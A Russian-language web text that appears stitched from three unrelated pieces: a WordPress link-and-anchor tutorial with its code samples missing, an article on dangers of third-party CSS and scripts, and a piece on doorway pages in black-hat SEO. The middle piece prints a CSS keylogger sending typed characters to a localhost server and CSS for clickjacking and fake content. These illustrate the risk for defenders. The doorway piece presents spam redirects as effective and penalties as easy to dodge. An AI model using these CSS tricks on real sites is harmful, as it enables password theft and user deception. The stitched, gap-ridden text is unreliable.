Проще всего в WordPress добавляются ссылки на сторонние ресурсы и ссылки между страницами и записями блога с помощью встроенного в редактор инструмента «Вставить/изменить ссылку». Немного сложнее вставляются ссылки на конкретный абзац, пункт, строку внутри страниц и записей, формируемые вручную в коде HTML.

1. Открываем в браузере страницу постороннего сайта, на которую хотим вставить ссылку, и копируем URL из адресной строки в буфер обмена.

2. Переходим в окно редактирования своей записи или страницы, выделяем текст будущей ссылки или ставим курсор в то место, где должна быть ссылка, нажимаем на панели инструментов текстового редактора кнопку с подсказкой «Вставить/изменить ссылку». В предыдущих версиях WordPress сразу открывалось основное окно с названием «Вставить/изменить ссылку». Если не ошибаюсь, с версии 4.5 оно стало открываться в свернутом виде с полем для вставки адреса и двумя кнопками: «Применить» и «Настройки ссылки» - эта кнопка и разворачивает окно «Вставить/изменить ссылку».

3. В открывшееся окошко добавления ссылки вставляем адрес из буфера обмена и нажимаем на кнопку «Применить» (а если текст ссылки предварительно не выделяли, нажимаем соседнюю кнопку «Настройки ссылки», как в пункте 5, для добавления текста ссылки):

Так как в примере текст ссылки был выделен заранее, ссылка готова:
Ссылка на сторонний ресурс: Дешевые авиабилеты .
4. Чтобы изменить URL, добавить или отредактировать отображаемый текст, способ открытия (в текущем или новом окне), выделяем ссылку и в появившемся окошке нажимаем кнопку «Изменить»:

5. Откроется уже знакомое окошко с полем добавления URL, в котором нажимаем кнопку «Настройки ссылки» для получения развернутого окна:

6. Откроется основное окно «Вставить/изменить ссылку»:

В этом окне можно установить галочку у пункта «Открывать в новой вкладке», заменить, если нужно, URL, добавить или изменить текст ссылки. Так как вставлять ссылку можно, не выделяя заранее текст, а добавив его в поле «Текст ссылки» окна «Вставить/изменить ссылку» - ссылка будет добавлена в то место, где первоначально стоял курсор. Нажимаем кнопку «Обновить».

Чтобы вставить ссылку на страницу или запись своего блога выделяем текст ссылки или ставим курсор в то место, куда должна быть добавлена ссылка. Нажимаем кнопку на панели инструментов «Вставить/изменить ссылку». В открывшемся окошке нажимаем кнопку «Настройки ссылки», после этого раскроется основное окно «Вставить/изменить ссылку»:

Из списка в нижней половине окна выбираем страницу или запись, кликаем по ней, URL вставляется автоматически, текст ссылки, если не выделяли заранее, можно вручную вписать в соответствующее окошко или вставить из буфера обмена, скопировав предварительно наименование страницы или записи прямо в списке. Если необходимо, отмечаем галочкой пункт «Открывать в новой вкладке» и, конечно, нажимаем кнопку «Добавить ссылку». Ссылка на страницу своего блога добавлена:
Ссылка на страницу своего блога: .

Чтобы сослаться на какое-то определенное место на странице или в записи, это место необходимо как-то пометить. Для этого рядом с ним вставляется закладка или, как ее еще называют, якорь. Кстати, на вкладке «Визуально» эта закладка будет помечена фигуркой якоря. В качестве примера рассмотрим вставку ссылок в пункты оглавления этой статьи и вставку закладок (якорей) в названия соответствующих разделов для перехода к ним из оглавления.

Закладки вставляются в HTML-редакторе (на вкладке «Текст») и представляют из себя следующую конструкцию:

Вместо link1 вставляем имя закладки.

Вместо link1 вставляем имя закладки, к которой необходимо перейти по ссылке, символ # (решетка, хэш) обозначает, что за ним следует id. Символ # без id в ссылке обозначает начало страницы и его используют для возврата к началу (вверх).

Теперь все по-порядку:

1. Придумываем имя закладки и переходим в HTML-редактор, выбрав вкладку «Текст».

2. Вставляем закладку в нужное место статьи. Я вставил якоря рядом с заголовками разделов:

Если поместить текст между открывающим и закрывающим тегами a , он будет подкрашен как ссылка.
3. Вставляем ссылки на закладки в пункты оглавления:

4. Теперь можно тестировать, в том числе и ссылку «Вверх»:

Вверх

5. Полная ссылка на закладку выглядит так: URLстраницы/#link1. Ее не нужно составлять вручную, достаточно перейти по ссылке на закладку и скопировать полный URL в адресной строке. Использовать этот адрес можно для перехода на закладку с других сайтов.

Рассказываем, как вы можете навредить своему сайту, используя сторонний CSS, JavaScript и другие ресурсы с чужих серверов.

В конце февраля в сети появился кейлоггер , частично использующий CSS. Атака с его помощью проста: для каждого символа, введенного в поле с определенным type (например, password), генерируется запрос на сторонний сервер, якобы запрашивающий фоновую картинку:

input { background-image: url("http://localhost:3000/a"); }

На сервере последовательность запросов можно зарегистрировать и легко вычислить введенный пароль.

В процессе обсуждения проблемы некоторые предложили производителям браузеров заняться фиксом. Кто-то обратил внимание, что проблема актуальна только для сайтов на React-подобных фреймворках, и переложил вину на них.

Если вы добавите изображение такого вида на сайт, вы попадете в зависимость от example.com. Они могут подставить вас разными способами, например, удалить картинку – вы получите 404 вместо изображения. А могут просто заменить изображение котика на что-нибудь менее приятное.

Вы можете предупредить своих пользователей, что изображение добавлено со стороннего ресурса и вы не имеете к нему отношения. Так вы немного себя обезопасите от неприятностей. Но, конечно, при добавлении простой картинки вы не предоставляете доступ к паролям.

Этот пример куда интересней для example.com, потому что добавляя скрипт с их сайта вы даете им куда больше контроля над своим. В этом случае example.com может:

• Читать/изменять содержимое страницы.
• Отслеживать каждое действие пользователя.
• Запускать трудный для вычисления код (например, криптомайнер).
• Запрашивать куки.
• Читать/изменять локальное хранилище.

Другими словами, теперь example.com может много чего.

Взаимодействие с локальным хранилищем в будущем приносит еще больше проблем. Сторонний ресурс будет иметь доступ к вашему сайту даже после удаления скрипта со страницы. Если вы добавляете сторонний скрипт на сайт, вы должны абсолютно доверять источнику и его безопасности.

Если вы все-таки столкнулись с плохим скриптом, попробуйте воспользоваться Clear-Site-Data header .

Сторонний CSS-код по воздействию на сайт находится между картинкой и скриптом. Чужой CSS умеет:

• Удалять/изменять/добавлять контент на странице.
• Делать запросы, основываясь на содержимом страницы.
• Реагировать на многие действия пользователя.

CSS не сможет взаимодействовать с локальным хранилищем и криптомайнер на страницу не встроит, однако может принести немало вреда владельцу ресурса.

Немного модифицируем CSS из начала статьи:

input { background-image: url("/password?a"); }

Этот код будет отправлять данные о введенном символе «a» в обработчик под видом запроса картинки. Повторите код для каждого символа и вот у вас уже есть кейлоггер на CSS.

По умолчанию браузеры не хранят введенные пользователем символы в атрибуте value, так что этот трюк сработает при использовании чего-то, что синхронизирует подобные значения, например, .

Разумеется, эта проблема может быть решена на стороне Реакта и подобных фреймворков. Но тогда будет решен лишь конкретный случай, а остальные проблемы останутся.

body { display: none; } html::after { content: "HTTP Server Server Error"; }

Это, конечно, очень своеобразный пример, но все же рабочий. Представьте, если ваши пользователи при заходе на сайт будут видеть вместо привычной главной страницы непонятную ошибку. Таким же образом сторонний код может удалить, например, кнопку «купить» или сделать какую-то еще неприятность.

Price-value::before { content: "1"; }

И вот так просто ваши цены взлетели.

Delete-everything-button { opacity: 0; position: absolute; top: 500px; left: 300px; }

Возьмите кнопку, которая делает что-то ужасное, и что пользователь просто так не нажмет, сделайте ее прозрачной и поместите в то место, куда пользователь обязательно кликнет.

Конечно, если кнопка делает что-то действительно важное, пользователь сначала увидит предупреждающий диалог. Но и это не проблема: просто нужно больше CSS. Например, можно изменить содержимое кнопки «О, господи, нет!», на «Конечно, я уверен».

Представьте, что производители браузеров поправили трюк с кейлоггером. Злоумышленники просто помещают лишнее текстовое поле поверх важного поля с типом password и они снова заняты делом.

В value и других атрибутах необязательно хранятся пароли: злоумышленник может найти еще что-то интересное.

< / div >

Все эти данные можно собрать CSS селекторами и отправить, куда следует.

Дорвей (син. дор, от англ. doorway, или входная дверь) — инструмент черного SEO, сайт, созданный для перенаправления пользователей на другой интернет-ресурс.

Сайт бесполезен с точки зрения пользователя, который часто даже не имеет возможности рассмотреть его страницу. Сайты-дорвеи часто регистрируют на бесплатных хостингах.

Текстовое содержимое часто бессмысленное, состоит из обрывков предложений с огромным количеством ключевых слов. Такие сайты только засоряют сеть Интернет. Основная цель дора - проиндексироваться и попасть в результаты выдачи.

С появлением алгоритмов релевантность ресурсов рассчитывалась исходя из грамотного контента и хорошо организованного семантического ядра. Но оформить страницы ресурса под абсолютно все запросы, сохранив при этом читабельность материала, не представлялось возможным, что и привело к неизбежному возникновению дорвеев. После появления ссылочного ранжирования такой метод продвижения предстал в своем современном виде, а именно в качестве переадресации пользователей на другой сайт и трансляции ссылочного веса.

Среди дорвеев можно условно выделить следующие типы:

Дорвеи причисляются к эффективным методам оптимизации сайтов. Избежать наказаний со стороны поисковых систем нетрудно - стоит лишь соблюдать простые правила. На создание доров уходит много времени и, по сути дела, их оптимизация ничем не отличается от продвижения обычных ресурсов.

За продвижение дорвеями системы банят или пессимизируют их. В правилах Яндекса написано, что сайты, занимающиеся трансляцией пользователей на сторонние ресурсы, причислятся к спаму и удаляются из индекса. Но попадают под бан или пессимизируются только дорвеи, за исключением дора на поддомене основного адреса; главный сайт остается нетронутым.

Но на самом деле поисковые системы карают доры редко, так как запросто может перепутать их с вполне солидными сайтами (например, microsoft.ru), занимающимися переадресацией во благо.

Белые и серые доры обвинить в спаме и вовсе не получается.

Как уже было сказано раньше, поисковикам трудно находить дорвеи. Хотя алгоритмы постоянно обновляются и стремятся выявлять и пресекать попытки переадресации с помощью мета-тегов и скриптов, развитие дорвеев тоже не стоит на месте, и вебмастера постоянно добавляют инновационные методы перенаправления пользователей.